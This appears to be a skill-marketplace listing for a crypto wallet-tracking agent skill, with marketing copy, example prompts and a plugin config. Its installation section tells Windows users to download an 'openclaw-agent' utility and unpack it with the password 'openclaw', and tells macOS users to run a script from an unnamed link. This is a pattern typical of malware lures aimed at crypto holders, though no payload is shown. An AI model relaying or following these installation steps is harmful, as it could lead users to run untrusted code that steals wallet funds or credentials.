wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Use the OpenClaw wallet-tracker skill to monitor whale movements, track ERC-20 and Solana transactions, and analyze portfolio changes with automated, real-time alerts.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-oozrxWhat This Skill Does
The wallet-tracker skill provides a robust framework for monitoring blockchain activity across Ethereum and Solana ecosystems in real-time. By leveraging the openclaw-agent utility, it enables users to observe whale movements, track significant portfolio changes, and receive automated updates on token transfers or NFT interactions. This skill acts as a bridge between blockchain explorers and your local terminal, facilitating programmatic analysis of decentralized finance (DeFi) interactions and on-chain movements.
Installation
To begin, ensure you have the OpenClaw agent installed. Run clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-oozrx in your terminal. For Windows users, download the openclaw-agent utility and extract it with the password 'openclaw'. macOS users must execute the installation script provided via the source snippet link. The agent must be running in the background for tracking tasks to succeed.
Use Cases
Wallet-tracker is ideal for decentralized finance enthusiasts, developers auditing smart contracts, and professional traders. You can use it to monitor the "smart money" (whales) to identify early entry points into new projects. Developers can use it to verify successful execution of transaction logic, while NFT collectors can track provenance and movement of specific assets across digital wallets. It is particularly effective for real-time portfolio management.
Example Prompts
- "Track 0x742d35Cc6634C0532925a3b844Bc454e4438f44e and alert me whenever a transaction exceeds 10 ETH."
- "Watch this Solana address and output the last 10 signature hashes to my dashboard every 60 seconds."
- "Show me the recent history of ERC-20 token transfers for my monitored portfolio to ensure all staking rewards have arrived."
Tips & Limitations
Always ensure your API keys (e.g., Etherscan) are correctly configured in your environment variables to avoid rate limiting. Because this skill relies on external node providers and RPC endpoints, latency may vary during periods of high network congestion. Keep in mind that privacy-focused wallets or mixers may obscure transaction details. For critical alerts, we recommend implementing custom filtering logic within the Python script provided in the technical documentation to filter out noise from low-value automated dust transfers.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-oozrx": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.